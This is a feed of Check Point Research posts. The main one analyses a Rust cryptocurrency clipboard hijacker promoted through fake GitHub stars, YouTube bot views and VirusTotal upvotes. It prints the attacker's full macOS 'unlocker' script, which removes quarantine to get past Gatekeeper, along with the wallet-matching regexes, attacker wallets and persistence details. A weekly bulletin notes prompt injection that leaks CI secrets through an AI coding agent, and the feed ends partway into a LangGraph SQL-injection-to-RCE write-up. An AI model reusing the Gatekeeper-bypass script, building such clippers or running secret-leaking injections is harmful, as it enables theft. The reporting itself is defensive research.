Normal view

Received — 18 June 2026 Check Point Research

From Stars to Upvotes: Fake Reputation Fueling a Crypto Clipboard Hijacker

17 June 2026 at 15:38

Key Points

  • The threat actor uses multiple channels to promote and distribute a Rust clipboard hijacker, starting with a dedicated phishing page as the central hub and extending to GitHub and SourceForge projects promoted by fake accounts. A dedicated YouTube channel, using AI‑generated narrators, suspicious view spikes, and highly positive (likely coordinated) comments, further reinforces the illusion of popularity and trustworthiness.
  • In addition, the threat actor’s tools were also promoted through posts on legitimate news websites. These articles appear to be either paid/promoted posts or content published via compromised news outlets, giving the malware extra legitimacy by placing it alongside trusted news content.
  • The same illusion mechanism extends to VirusTotal, where some samples from this campaign receive benign votes and “safe” comments. Combined with the already low detection rate, this creates a misleading impression of safety that can influence both end users and reputation‑based detection systems.


Introduction

In this research, we analyze a clipboard hijacker campaign that is hidden inside a collection of “solutions” and “tools” that claim to give users an unfair advantage. These offers include Solana and Pump.fun sniper bots (automated tools that try to buy new tokens or meme coins faster than other traders), Aviator Predictor (software that claims to predict the outcome of the popular “Aviator” multiplier game), and several crash‑game “predictors” (programs that supposedly forecast when online betting games will stop and “crash”). The operation mainly targets users who are looking for shortcuts and quick profits—particularly crypto owners and online crash‑game gamblers and traders who are attracted by promises of automated gains and “predictable” outcomes.

To make this operation look legitimate and attractive, the threat actor has built an ecosystem across several platforms. A WordPress phishing site serves as the main landing page, while GitHub and SourceForge projects are used to host and distribute the files. These repositories show inflated engagement—such as high numbers of stars, forks, ratings, and downloads—likely generated by “Ghost Networks” of fake accounts. A YouTube channel, featuring AI‑generated narrators and suspicious spikes in views, promotes the same tools and adds another layer of social proof. In addition, the actor abuses sentiment and reputation signals on VirusTotal, where some samples from this campaign receive benign votes and “safe” comments. Combined with the already low detection rate, this creates a misleading impression of safety that can influence both end users and reputation‑based detection systems.

Behind this social‑engineering and promotion layer, the actual payloads delivered to victims are Rust‑based clipboard hijackers for both Windows and macOS. These binaries install persistence, continuously monitor the clipboard for strings that look like cryptocurrency wallet addresses, and replace them with attacker‑controlled wallets from large, embedded lists. The attacker‑controlled cryptocurrency wallets appear to have received multiple transactions, providing the actor with notable illicit gains.


Phishing Page

This phishing website promotes a mix of “edge” tools that all promise easy, unfair advantages. On one side, Solana / Pump.fun / DEX sniper bots claim they can automatically buy and sell new meme coins faster than other traders. On the other, Aviator Predictor and several Crash Predictors pretend to “decode” or “predict” crash‑game results so users can supposedly win more often. In most cases, victims are funneled to this site through links shared on social media, crypto forums, and Telegram channels. The clear targets are crypto owners, gamblers, and traders who are already looking for shortcuts and quick, automated gains.

Figure 1 — Phishing page.

The WordPress author is @JoseCmanXD, and the same name is used for the Telegram contact provided on the website.

Figure 2 — Telegram account provided in phishing page.

From the website, the actor provides links to GitHub, SourceForge, and YouTube. Across these platforms, the associated content shows inflated engagement, including likely manipulated views and interactions, making the tools appear more popular and trustworthy than they really are.

This inflated engagement appears to be driven by the threat actor’s use of multiple Ghost Networks on each platform. These Ghost Networks consist of fake or low-quality accounts and channels that repeatedly promote his tools, boost view counts, and generate likes or comments, thereby creating a false sense of credibility and social proof for potential victims.


GitHub & SourceForge

The actor appears to operate at least six GitHub accounts to promote and distribute his malicious software. These accounts also seem to collaborate with each other, as they are sometimes listed as contributors to one another’s repositories.

Figure 3 — GitHub account.

The main accounts attributed to the threat actor are Decryptor-j, crash-predictor1, roblox-script1, hack-scripts, and stake-mines. Many of their repositories have received multiple stars and forks from various accounts. This activity appears to be the result of the threat actor’s use of GitHub Ghost Networks, where controlled or fake accounts repeatedly star and fork the repositories to create an illusion of popularity and trustworthiness.

Figure 4 — Repository with 146 stars and 62 forks.

In total, just from GitHub, there appear to be just over 5,000 downloads and potential infections originating from the accounts mentioned above. Of these, over 1,250 downloads are associated with the macOS version of the promoted software “Aviator Predictor”, also indicating an impact on Mac users. When we also consider downloads originating from other platforms and the phishing website itself, the overall number of downloads and potential infections significantly exceeds the figures observed on GitHub alone.

In addition to GitHub, the threat actor also promotes another similar platform on the phishing page, SourceForge. SourceForge allows users to rate projects and leave comments. On this platform, we again observe fake or coordinated accounts posting highly positive feedback, similar to the behavior seen on other platforms that support user engagement. This activity further reinforces a misleading impression of legitimacy and reliability around the malicious tools.

Figure 5 — Positive engagement.

In general, SourceForge appears to have a smaller number of ghost accounts operating on its platform compared to other services observed in previous cases. Although we see relatively few comments or reviews, the download statistics seem highly manipulated, with a total of 44,485 downloads, the majority of which appear to originate from Pakistan and India.

Figure 6 — SourceForge download statistics.

It is interesting to note that the majority of downloads (37,460) appear to come from devices running Android. This is highly suspicious, as the developer currently offers only Windows and macOS versions. We cannot fully confirm this hypothesis, but a plausible explanation is the use of an Android farm to artificially inflate the download count on SourceForge.


YouTube & AI Usage

Another platform promoted through the phishing site is a YouTube channel showcasing the advertised “software” solutions. The videos have a relatively high number of views and likes, which likely helps attract additional victims and convinces them of the supposed effectiveness of these tools. Some older videos appear to target a Russian-speaking audience, suggesting that the threat actor initially focused on Russian-speaking user communities. More recent videos, however, appear to target a broader, global audience by using English.

Figure 7 — YouTube Channel.

Through the actor’s YouTube account, we again observe contact details that link the channel back to the WordPress site and the Telegram account @JoseCmanXD, further strengthening the attribution between these platforms and the same threat actor.

Figure 8 — Channel contact details.

The videos have a substantial number of views, however, their view counts do not show organic growth. Instead, we observe suspicious spikes in views, which is consistent with the use of YouTube Ghost Networks, where bot accounts artificially engage with the videos to inflate view numbers and make them more attractive to potential viewers.

Figure 9 — Suspicious view spikes, artificially inflated views.

In the comment section, we observe highly positive engagement that is likely used to lure potential victims and make them trust the effectiveness of the showcased solution. Many of these accounts appear to be Ghost Accounts that are used to generate fake views and artificial engagement. We also observe comments from potentially real users complaining about the actual effectiveness of the tools, which further indicates that the promoted software does not work as advertised.

Figure 10 — Positive engagement.

The YouTube video is styled to look like a genuine personal tutorial. It shows a desktop screen with visible mouse movements, as if a real user is demonstrating the “software” in real time. At the same time, an AI-generated narrator appears in the bottom-right corner, providing continuous instructions. This combination of on-screen activity and synthetic presenter is likely used to build trust and make the demonstration appear more authentic and convincing to potential victims.

Figure 11 — AI Generated Narrator.

The use of AI by cybercriminals is not limited to AI-assisted malware. Threat actors are constantly trying to incorporate these new technologies throughout the entire attack chain, including phishing, social engineering, content generation, and delivery mechanisms.


VirusTotal Upvotes Manipulation

Check Point Research has observed that some VirusTotal accounts post community comments and cast benign votes in an attempt to portray clearly malicious Indicators of Compromise (IOCs) as harmless. When this sentiment manipulation coincides with low antivirus detection rates, reputation-based detection systems may be more likely to misclassify these IOCs as benign, potentially allowing them to bypass security controls.

Reputation-based detection allows security teams to make fast, risk-informed decisions about files, URLs, and other network indicators by leveraging global threat intelligence, rather than relying solely on local detections. A key contributor to this intelligence ecosystem is VirusTotal, which aggregates malware and phishing indicators from dozens of security engines and community submissions. This shared visibility helps security vendors rapidly identify emerging threats and malicious infrastructure, strengthening reputation models when combined with their own telemetry and behavioral detection capabilities.

Figure 12 — VirusTotal upvotes and safe comment.

This specific threat actor has incorporated multiple Ghost Network services across GitHub, SourceForge, YouTube, and even VirusTotal. We systematically observed samples downloaded from the phishing site that not only had a low detection rate, but also showed positive engagement on VirusTotal, including upvotes and comments describing the binary as safe. This coordinated activity is likely intended to reduce suspicion and increase victims’ trust in the malicious files.

Figure 13 — VirusTotal upvotes and safe comments, through multiple samples.

While the low detection rate itself is not caused by the positive engagement, the combination of low detections and seemingly positive community feedback creates a strong, but false, impression of safety.


Promotion via News Sites & Forums

While searching for traces of the Telegram handle @JoseCmanXD, we also found references on legitimate news websites. These posts appear to be advertisements promoting the tool’s supposed capabilities and include links back to the phishing page, further luring potential victims into downloading the malicious software.

Figure 14 —The National Law Review, decryptor post.

Such posts could potentially be used to further legitimize the tool and make it appear trustworthy, as its capabilities are being advertised on legitimate news websites. This kind of exposure can mislead users into believing the solution is safe and reputable, when in reality it is part of a malicious campaign.

By searching further, we identified additional related posts from other news-oriented sources. All of these posts appear to have been published on the same day, April 27, 2026, suggesting a coordinated effort to promote the malicious tool within a short time frame.

Figure 15 — Google search results.

The majority of these posts have since been taken down and now appear only as remnants in Google search results. It is unclear whether the threat actor published them through paid advertisements that were later removed by the news outlets after being notified of their malicious nature, or whether there is a malicious service—or a set of compromised news outlets—that offers this kind of fraudulent promotion on legitimate websites.

Beyond using news outlets, the actor also promotes the malicious tool on various forums, particularly those frequented by the targeted audience, such as cryptocurrency-focused communities.

The actor posted on BitcoinTalk.org a long-running online forum founded in the early days of Bitcoin, where users discuss cryptocurrencies, blockchain technology, mining, and related projects. While the site itself is legitimate and historically significant in the crypto community, anyone can post content, including promotions, investment opportunities, and potential scams.

Figure 16 — Bitcoin-related forum post.

Early signs of the actor’s activity were found on a hacking forum where the user has been active since 2019. In 2022, the user created a post titled BLACKHAT | Bitcoin Stealer | Advanced Builder | Tutorial | Clipper [Address Changer]+Re-Fud method, in which he shared a malicious crypto-related tool.

Figure 17 — @JoseCmanXD CryptoRipper.

In addition to providing this malicious tool, the same account has shown interest in other topics such as GET UNLIMITED YOUTUBE VIEWS FREE. This activity could help explain the unusually high view counts and abnormal view spikes observed on the associated YouTube content.


Windows Version

The ‘solutions’ are downloaded as a ZIP archive and contain multiple files, the majority of which are unused throughout the execution of the malicious program. While the threat actor updates the main malicious sample every few weeks, the rest of the unused samples remain untouched.

SniperBot_Premium(Free)/
├── SniperBot_Premium(Free).exe
├── Sniper_TradingBot.Premium(Trial).exe.config
...
...
├── src/            
│   ├── config/
│   │   └── silkebin.exe
...
...

The victim needs to trigger SniperBot_Premium(Free).exe (or other related name depending on the “solution” promoted). This file is a simple .NET loader which executes the file located in src/config/silkebin.exe.

Figure 18 — Execution of Rust Clipboard Hijacker.

This Windows executable is a Rust-built cryptocurrency clipboard hijacker (clipper). It installs itself for persistence and then continuously monitors the user’s clipboard for cryptocurrency wallet addresses. When it detects a supported address format, it replaces the clipboard contents with an attacker‑controlled wallet address taken from an internal list. The sample achieves persistence by copying itself to %APPDATA%\\silke\\silke.exe and creating a shortcut in the Startup folder so it will automatically run at logon.

The malware creates a hidden window and registers as a clipboard listener using Windows APIs such as AddClipboardFormatListener, OpenClipboard, GetClipboardData, EmptyClipboard, and SetClipboardData. Each time the clipboard changes, it checks whether the new text matches the pattern of a cryptocurrency wallet address (for example, Bitcoin, Ethereum/EVM, Litecoin, Tron, XRP, Cardano, and others) using regular expressions.

If a match is found, the malware replaces the clipboard text with an attacker‑controlled address from a large internal list. This list contains over 15,500 wallet addresses: about 15,000 are Bitcoin-related (5,000 Bitcoin bech32, 5,000 Bitcoin legacy, and 5,000 Bitcoin P2SH), roughly 500 are Ethereum addresses, and the remaining entries include Bitcoin Cash/Gold, Monero, Dogecoin, Cardano, Litecoin, and other cryptocurrencies.

CurrencyRegexAttacker’s Wallets (Count)
Bitcoin Bech32\\b(bc1)[A-Za-z0-9]{26,45}\\b5000
Bitcoin Legacy (P2PKH)\\b(1)[A-Za-z0-9]{26,35}\\b5000
Bitcoin P2SH\\b(3)[A-Za-z0-9]{26,35}\\b5000
Ethereum / EVM\\b(0x)[A-Za-z0-9]{40,46}\\b501
Bitcoin Cash (CashAddr)\\b(q)[A-Za-z0-9]{26,43}\\b1
Bitcoin Cash (full prefix)\\b(bitcoincash:)[A-Za-z0-9]{26,58}\\b1
Bitcoin Gold\\b(btg)[A-Za-z0-9]{26,43}\\b1
Stellar (XLM)\\b(G)[A-Za-z0-9]{26,40}\\b1
Cardano legacy / others\\b(A)[A-Za-z0-9]{26,40}\\b1
Monero (spend key prefix 4)\\b(4)[A-Za-z0-9]{90,98}\\b1
Monero (integrated address)\\b(8)[A-Za-z0-9]{90,98}\\b1
Dogecoin\\b(D)[A-Za-z0-9]{26,35}\\b1
Cardano (Shelley)\\b(addr1)[A-Za-z0-9]{26,108}\\b1
Cardano (Byron)\\b(DdzFF)[A-Za-z0-9]{26,108}\\b1
Litecoin (L-prefix)\\b(L)[A-Za-z0-9]{26,35}\\b1
Litecoin (M-prefix)\\b(M)[A-Za-z0-9]{26,35}\\b1
Litecoin Bech32\\b(ltc)[a-z0-9]{26,68}\\b1
Zcash (t-address)\\b(t1)[A-Za-z0-9]{26,36}\\b1
Tron (TRX)\\b(T)[A-Za-z0-9]{32,37}\\b1
XRP (Ripple)\\b(r)[A-Za-z0-9]{31,38}\\b1

The attacker’s wallets appear to be replaced quite frequently. In many cases, it seems that once a malicious transaction is completed, the attacker swaps the used wallet for a new, “clean” one. Older samples of this variant contain fewer attacker-controlled wallets—typically only one per targeted currency—and also target fewer cryptocurrencies overall. The latest version expands this list to include additional cryptocurrencies that were not previously targeted, such as Bitcoin Gold, Stellar (XLM), Cardano legacy/Byron, and Dogecoin. At the same time, the attacker has removed support for one cryptocurrency in the new variant, Binance Chain.

Below is an example of how victims are tricked into sending money to the attacker’s wallet.

Figure 19 — Clipboard Hijacker, replacing with attacker’s wallet.

macOS Version

Through his website, GitHub-controlled repositories, and SourceForge projects, the threat actor is also targeting macOS users. The “solutions” provided for macOS are aimed at the same audience as the Windows versions, with the same ultimate goal of stealing cryptocurrency from victims.

Figure 20 — macOS cryptocurrency clipboard hijacker.

The victim downloads a ZIP file from one of the sources mentioned above and finds, among other items, an instruction file named !!! READ THIS - RUN UNLOCKER IF APP IS BLOCKED.txt.

!!! READ THIS - RUN UNLOCKER IF APP IS BLOCKED INSIDE THE FOLDER !!

1- In Finder, Control-click (or right-click) unlocker (or unlocker.command).

2- Choose Open from the contextual menu.

3- In the dialog that appears, click Open again.	

 A small Terminal window or dialog will appear. Wait — it will automatically prepare and open HashScanner.

Unlocker Fixes HashScanner when you see an error like

"App is damaged and can't be opened" or "can't be opened because it is from an unidentified developer":

If this does not work, please contact @JoseCmanXD on telegram and include a screenshot of the error.

Thank you!

The instruction file tells the user to run unlocker.command, which automates the process of “fixing” the blocked application. The script searches for .app bundles in the same folder (or uses an app dragged onto it), removes the macOS quarantine attribute using xattr -cr, and then launches the chosen application with open. By wrapping this logic in simple dialogs and messages, the attacker makes it easy for non-technical users to bypass Gatekeeper warnings and run the malicious app.

#!/bin/bash
# unlocker.command - auto unlocker for .app bundles in the same folder
# Double-click this file in Finder (or drag an .app onto it) to remove quarantine and open the app.

# Get the directory where this script lives (works when double-clicked)
DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"

# If user passed one or more args (drag-drop), use those instead of auto-search
if [ $# -gt 0 ]; then
  targets=()
  for a in "$@"; do
    targets+=("$a")
  done
else
  # Find .app bundles in the same folder (only top-level)
  targets=()
  while IFS= read -r -d $'\\0' f; do
    targets+=("$f")
  done < <(find "$DIR" -maxdepth 1 -type d -name "*.app" -print0)
fi

# Helper to show macOS dialog
show_dialog() {
  /usr/bin/osascript -e "display dialog $1 buttons {\\"OK\\"} with title \\"Unlocker\\""
}

# No apps found
if [ ${#targets[@]} -eq 0 ]; then
  /usr/bin/osascript -e 'tell app "Finder" to display dialog "No .app found in the same folder. Please place your .app (e.g. HashScanner.app) in the folder with this Unlocker and double-click again, or drag the .app onto this Unlocker." buttons {"OK"} with title "Unlocker"'
  exit 1
fi

# If exactly one target, use it automatically
if [ ${#targets[@]} -eq 1 ]; then
  chosen="${targets[0]}"
else
  # Multiple: ask user to choose via AppleScript list
  # Build a quoted list of basenames for Applescript
  applescript_list=""
  for f in "${targets[@]}"; do
    name="$(basename "$f")"
    # escape backslashes and double quotes
    esc_name="${name//\\\\/\\\\\\\\}"
    esc_name="${esc_name//\\"/\\\\\\"}"
    if [ -z "$applescript_list" ]; then
      applescript_list="\\"$esc_name\\""
    else
      applescript_list="$applescript_list, \\"$esc_name\\""
    fi
  done

  chosen_name=$(/usr/bin/osascript <<AS
set theList to { $applescript_list }
set chosen to choose from list theList with prompt "Choose the app to unlock and open:" default items {item 1 of theList}
if chosen is false then
  return "CANCEL"
else
  return item 1 of chosen
end if
AS
)

  if [ "$chosen_name" = "CANCEL" ]; then
    /usr/bin/osascript -e 'display dialog "No app selected. Exiting." buttons {"OK"} with title "Unlocker"'
    exit 0
  fi

  # find the full path that matches the chosen base name
  chosen=""
  for f in "${targets[@]}"; do
    if [ "$(basename "$f")" = "$chosen_name" ]; then
      chosen="$f"
      break
    fi
  done

  if [ -z "$chosen" ]; then
    /usr/bin/osascript -e 'display dialog "Selected app not found. Exiting." buttons {"OK"} with title "Unlocker"'
    exit 1
  fi
fi

# Final safety check: chosen is a directory and ends with .app
if [ ! -d "$chosen" ]; then
  /usr/bin/osascript -e 'display dialog "The selected item is not an application. Exiting." buttons {"OK"} with title "Unlocker"'
  exit 1
fi

# Run xattr -cr and open. Both commands are absolute paths to avoid PATH issues.
/usr/bin/printf "Removing quarantine from: %s\\n" "$chosen"
/usr/bin/xattr -cr "$chosen" 2>/dev/null
ret=$?
if [ $ret -ne 0 ]; then
  /usr/bin/osascript -e 'display dialog "Failed to remove quarantine (permission or other error). You can try running this script from Terminal for more details." buttons {"OK"} with title "Unlocker"'
  # still attempt to open so user can try
fi

/usr/bin/printf "Opening: %s\\n" "$chosen"
/usr/bin/open "$chosen"

# Let user know we're done
/usr/bin/osascript -e 'display dialog "Done — the app was unlocked (if possible) and opened." buttons {"OK"} with title "Unlocker"'
exit 0

Similar to its .NET Windows variant, the main program on macOS is also just a loader that executes another file located in nested folders.

The executed file is a malicious macOS executable written in Rust that acts as a cryptocurrency clipboard hijacker (clipper). Its main loop monitors the macOS pasteboard, detects wallet-like strings using embedded regular expressions, and replaces them with hardcoded attacker-controlled wallet addresses bundled inside the binary.

To maintain persistence, the malware writes a shell script wrapper to ~/launch.sh and installs a RunAtLoad and KeepAlive LaunchAgent plist at ~/Library/LaunchAgents/com.example..plist, causing launchd to silently re-execute the binary on every login and restart it if it dies. A 30-second watchdog loop (mw_watchdog_copy_and_relaunch) continuously re-writes both files and clones the binary via fcopyfile, making the persistence self-healing against manual removal without first killing the process.

The macOS variant appears to be closer in design to the older Windows version, where each regular expression pattern is associated with only a single attacker-controlled wallet address, rather than multiple addresses per currency.

Coin familyRegex patternAttacker’s Wallet
Bitcoin (BTC)\\b(bc1)[A-Za-z0-9]{26,45}\\bbc1qr8vgrcvacyea68gk6w0kdzt2xcc93azzhalyjl
Bitcoin (BTC)\\b(1)[A-Za-z0-9]{26,35}\\b1JKeTeM7H3P1hj2DYB6vnXWeJ7XgKvXb7D
Bitcoin (BTC)\\b(3)[A-Za-z0-9]{26,35}\\b3EBa4JbKY3HJx6KZopR1sV1upEvxm3dwR1
Bitcoin Cash (BCH)\\b(q)[A-Za-z0-9]{26,43}\\bqp5c3syh4t750jwpljzdmnndddlj7zg64gjhxgm8nd
Bitcoin Cash (BCH)\\b(bitcoincash:)[A-Za-z0-9]{26,58}\\bbitcoincash:qzn9dpl6fs7ywue3ms2wpcjad3wwmax8xgqtkdr7pd
Bitcoin Gold (BTG)\\b(btg)[A-Za-z0-9]{26,43}\\bbtg1q4v9xfvgv4792cg394dmfz8ctd2hhu5xgype2ty
Ethereum / EVM (ETH‑style)\\b(0x)[A-Za-z0-9]{40,46}\\b0x22f24a22b6f824E9ef76B05B186c4D0C2Df58d67
Monero (XMR)\\b(4)[A-Za-z0-9]{90,98}\\b48SWwQ7QUSSPhHS9zWF9V9TKyK7FZVxDd9LghKbbkkYzB3AbhyKaCozMc26siguA2b6tce6tztCTXCWgyrypBLmW7HRxs6D
Monero (XMR)\\b(8)[A-Za-z0-9]{90,98}\\b8BWn9uaExAu2YP3duvbYR2jYfVXMUqnTQYPizkEz1EWrKCGA9Mk912fE3XeZ3P77wTAVp2yDmcKuWiXos6JRAgRtKGijrza
Binance Chain (BNB)\\b(bnb)[A-Za-z0-9]{26,44}\\bbnb1aj96a2f8655rl2hdrzghlagjpe2nm40tp7jq2v
Dogecoin\\b(D)[A-Za-z0-9]{26,35}\\bDDrusqzPjEovYyFrtDV8PVZVZDFFvpGAkc
Cardano (ADA)\\b(addr1)[A-Za-z0-9]{26,108}\\baddr1qytkt94c60hcg27hd9n3zgejxlha6c0v0rpaufgrvxzprkshvktt35l0ss4aw6t8zy3nydl0m4s7c7xrmcjsxcvyz8dqxlg07g
Cardano (ADA)\\b(Ae2)[A-Za-z0-9]{26,105}\\bAe2tdPwUPEZE9kTmNo42ADPop6fXgrSU81n8EERR2ELyCMDh4jrGC4K514q
Cardano (ADA)\\b(DdzFF)[A-Za-z0-9]{26,108}\\bDdzFFzCqrht6dsYcpUFCaMmtBZx7kWS62kBBBiQuaJgW6VJYqfk3hhNNmvL4Zup8pDr32J7JSrG7Pkk77cFFe3H73C5j65tDKTfVp9YV
Litecoin (LTC)\\b(L)[A-Za-z0-9]{26,35}\\bLS6vZukRTqjHtC3ZVYjzPDsiK6UdWdxuhg
Litecoin (LTC)\\b(M)[A-Za-z0-9]{26,35}\\bMJjPAnpe83WAoEFsdLJUKi76GeHx9HkYoU
Litecoin (LTC)\\b(ltc)[a-z0-9]{26,68}\\bltc1qxa03u2udf0a6znuhrrxc6wc4q28wmceh8muqyl
Zcash (ZEC)\\b(t1)[A-Za-z0-9]{26,36}\\bt1RH2YT8Mdo4VJL2tdkkw71N751K5Gc5AGR
TRON\\b(T)[A-Za-z0-9]{32,37}\\bTBFqTqF17fRvSXDh7U8k5mVFxjqkKrWUXm
XRP\\b(r)[A-Za-z0-9]{31,38}\\brfzq3PnZAt6eFKcJ9TXHsAm2c8GuguHUc1
Altcoin\\b(G)[A-Za-z0-9]{26,40}\\bGYzpABfDYfSXq3tq64u8v33zcT71Wy1dsG
Altcoin\\b(A)[A-Za-z0-9]{26,40}\\bAYVNJxRrfpLKVPCkzVKtkq5rTDUhst7KtQ
Solana\\b[A-Za-z0-9]{44}\\b7UQuwTTbZ9SoMY1E8D3DMyPjFCPCXjED2wcj8uhshyzW


Conclusion

In conclusion, this operation combines simple but effective malware with strong social engineering and aggressive cross‑platform promotion. A WordPress phishing site, manipulated engagement on GitHub and SourceForge, AI‑driven YouTube videos, VirusTotal sentiment abuse, and even posts on news outlets and crypto forums all work together to make the tools appear popular, legitimate, and safe. The updated Ghost Networks model is designed to repeatedly expose the victim to positive signals (stars, comments, votes, “safe” labels) so that, by the time they run the tool, it feels like a normal, benign application rather than a threat.

From a user’s perspective, the ability to manipulate sentiment and reputation on platforms like VirusTotal marks an important evolution in how threat actors shape trust. Even if this campaign is not primarily aimed at large enterprises, it shows that attackers no longer rely only on classic malware distribution techniques to reach victims. Instead, they can manipulate reputation systems, crowd‑sourced feedback, and cross‑platform promotion to lower suspicion and attract more users.

These techniques can also be abused by other types of actors distributing and promoting information stealers or other malware families, which can eventually lead to full ransomware compromises in more mature environments. In other words, the same playbook of fake reputation and broad promotion can be reused to deliver more damaging payloads over time.


Indicators of Compromise

DescriptionValue
Clipboard Hijacking Malware5518942d9d21794aaeff41a01b88606a96659fc329b481a2f0946d8163ab4d61
33c86ecfc324de3af97150bd009aba7925a6ba7a0842e127e94cf351013c0fe6
7a7ad4ae347a3f99f3773a113d9f70ecfa967100c96e8275bd1df833caee68d1
bad8625087a7b9453c70933c0db32518ff5818e3d83f3a9e78d432a22b383edb
c1435847b0c437f91efb07a3a35e4468036322d7acf4ba9e6d363cec0b481241
ef9a915c8e1d484e52b3287c94a58ecd22c07391a87f9c136eabd8397ed01ca2
5518942d9d21794aaeff41a01b88606a96659fc329b481a2f0946d8163ab4d61
e02e60a23297692637b43ebcd7dbeb63af1e9680c551586a1ce935218e0034be
fb8294b12f904dff2ac79b51872be7bf09ab422cde223caaf4762eadf7e0760d
a91c09e0eea610dbe5879798f9cf12e3ce51e4e6f0893278bcdf3ebe22c4730b
9c566db1ef9d08ee389d2b8cc1c50c65870096130c8bd2cf41ea14c4075e94c0
.NET Loaderf737e99177cc05037ff34cf6e245dd56377dc3db4e2bb46edcf039df650939d6
7a9632bbecc31d02fdd0eab07e2424b3e1c9e9a3f91aac4ef6f708f2befbaa3d
MacOS Clipboard Hijacking Malwareb71efdebd0ca3563e67edb7ad59358a6b8f013b219ad65033efcf48fd1c86619
MacOS Loader6f12c066a929c96104796c4ecca938754962009ebd9e4ba5329bb940bf331d0a

The post From Stars to Upvotes: Fake Reputation Fueling a Crypto Clipboard Hijacker appeared first on Check Point Research.

15th June – Threat Intelligence Report

By: urias
15 June 2026 at 15:40

For the latest discoveries in cyber research for the week of 15th June, please download our Threat Intelligence Bulletin.

TOP ATTACKS AND BREACHES

  • The University of Nottingham, a UK research university, has suffered a data breach after ShinyHunters accessed its student records system. The incident affected about 454,600 current and former students and exposed contact details, passport numbers, enrollment information, and fee payment records later appeared online. According to analysts, this breach is part of a larger wave of attacks targeting more than 100 organizations by ShinyHunters, exploiting CVE-2026-35273, a critical zero-day vulnerability in Oracle PeopleSoft that allows remote code execution.

Check Point IPS provides protection against this threat (Oracle PeopleSoft Enterprise PeopleTools Server-Side Request Forgery (CVE-2026-35273))

  • Mackay Sugar, Australia’s second-largest sugar producer, has been hit by a cyberattack that disrupted operations and shut down its Farleigh and Racecourse mills in Queensland. The company instructed growers to stop harvesting and suspended cane haulage while temporary measures were deployed to maintain essential operations.
  • Danish pharmaceutical giant Novo Nordisk has disclosed a breach after attackers accessed internal IT systems and copied pseudonymized clinical trial data from research systems. The exposed information included patient IDs, trial participation details, limited health data, and some healthcare professionals’ contact information.

AI THREATS

  • Check Point Research has demonstrated exploitable flaws in LangGraph, an open-source framework for stateful AI agents. Researchers chained SQL injection and unsafe deserialization issues to achieve remote code execution, with patches issued for SQLite, core, and Redis checkpointer components in affected deployments.

Check Point IPS provides protection against this threat (LangChain LangGraph SQL Injection (CVE-2026-27022))

  • Researchers highlighted a China-based phishing-as-a-service network, Outsider, that allegedly used Gemini to generate fake websites and support SMS phishing campaigns. Google filed a lawsuit after linking the operation to thousands of phishing sites, more than 1.5 million URLs, and large-scale victim targeting.
  • Researchers warned that prompt-injection attacks against Anthropic’s Claude Code GitHub Action could leak CI/CD workflow secrets. Malicious issue or pull request text can instruct the agent to read environment variables and expose API keys, enabling workflow abuse and impersonation inside software repositories.

VULNERABILITIES AND PATCHES

  • Check Point Research has identified active exploitation of CVE-2026-50751, a critical authentication bypass vulnerability affecting Check Point Remote Access VPN and Mobile Access deployments configured to use the deprecated IKEv1 key exchange protocol. Attacks began in May and increased in early June, affecting a limited number of organizations, with one case tied to Qilin ransomware activity.

Check Point IPS provides protection against this threat (IKEv1 Remote Access Authentication Bypass PoC Exploit (CVE-2026-50751))

  • Microsoft released its largest Patch Tuesday update to date, addressing more than 200 Windows and Defender vulnerabilities amid an AI-driven surge in vulnerability discovery. The fixes include CVE-2026-45657, a critical Windows flaw with a CVSS score of 9.8 that could enable network-based propagation, CVE-2026-41091, which has been actively exploited to gain full system control, and CVE-2026-50507, a BitLocker bypass vulnerability.
  • Veeam has released security updates to fix a critical flaw affecting Backup & Replication. The vulnerability allows an authenticated domain user to execute code remotely on a domain-joined backup server, exposing sensitive backup infrastructure and recovery systems.

THREAT INTELLIGENCE REPORTS

  • Check Point Research’s May 2026 attack trends report found that organizations experienced an average of 2,055 weekly attacks, down 7% month over month, while ransomware incidents increased 48% year over year. The report also highlights continued GenAI exposure across enterprise environments, including risks linked to business-related prompts.
  • Researchers detected a supply-chain compromise in the Arch User Repository, where attackers seized hundreds of packages and modified build scripts to install credential-stealing malware. The campaign deployed malicious dependencies, a Rust stealer, and, with administrative privileges, an eBPF rootkit on Linux systems.
  • Researchers analyzed a Brazilian phishing campaign abusing the legitimate NinjaOne remote management agent to gain access to company computers. The campaign uses fake Portuguese business portals and phone-based social engineering to install a signed agent connected to attacker-controlled infrastructure on victim endpoints
  • Researchers described ongoing exploitation of WinRAR flaw CVE-2025-8088 by Russia-linked groups targeting Ukrainian military and government organizations. Spear-phishing archives plant hidden files that run at login and deploy stealers for browser passwords, cookies, VPN configurations, and other credentials across affected Windows systems.

The post 15th June – Threat Intelligence Report appeared first on Check Point Research.

From SQLi to RCE – Exploiting LangGraph’s Checkpointer

11 June 2026 at 15:37

By Yarden Porat

AI agents need memory. Frameworks like LangGraph provide it through checkpointers – persistence layers that store execution state. But what happens when that persistence layer isn’t locked down?

Key Points

  • Check Point Research analyzed LangGraph, an open-source framework for stateful AI agents with over 50 million monthly downloads, and uncovered three vulnerabilities in its persistence layer.
  • Two of them chain into remote code execution: a SQL injection in the SQLite checkpointer (CVE-2025-67644) and an unsafe msgpack deserialization (CVE-2026-28277).
  • A third, parallel issue (CVE-2026-27022) introduces the same injection class into the Redis checkpointer.
  • Who’s at risk: teams self-hosting LangGraph with the SQLite or Redis checkpointer, where the application exposes get_state_history() with a user-controlled filter. LangChain’s managed cloud service, LangSmith Deployment (formerly LangGraph Platform), runs PostgreSQL and is not vulnerable.
  • LangChain patched all three issues. Users should update to langgraph-checkpoint-sqlite 3.0.1+, langgraph 1.0.10+, and langgraph-checkpoint-redis 1.0.2+.

Background

LangGraph is an open-source framework for building stateful, multi-agent AI systems with built-in persistence. It’s an extension of LangChain, with over 50 million monthly downloads according to PyPI stats.

Checkpointers are LangGraph’s persistence layer that stores execution state at each step. LangGraph supports two checkpointer implementations: SQLite and PostgreSQL.

Vulnerability #1: SQL Injection (CVE-2025-67644)

The SQLite Checkpointer Database Schema:
The SQLite checkpointer uses an internal table called checkpoints with the following structure:

CREATE TABLE checkpoints (
    thread_id TEXT NOT NULL,
    checkpoint_ns TEXT NOT NULL DEFAULT '',
    checkpoint_id TEXT NOT NULL,
    parent_checkpoint_id TEXT,
    type TEXT,
    checkpoint BLOB,
    metadata BLOB,
    PRIMARY KEY (thread_id, checkpoint_ns, checkpoint_id)
);

The metadata column stores additional contextual information about each checkpoint in JSON format. For example:

{
  "user_id": "alice",
  "step": 1,
  "source": "input"
}

The list() Function and Filtering:

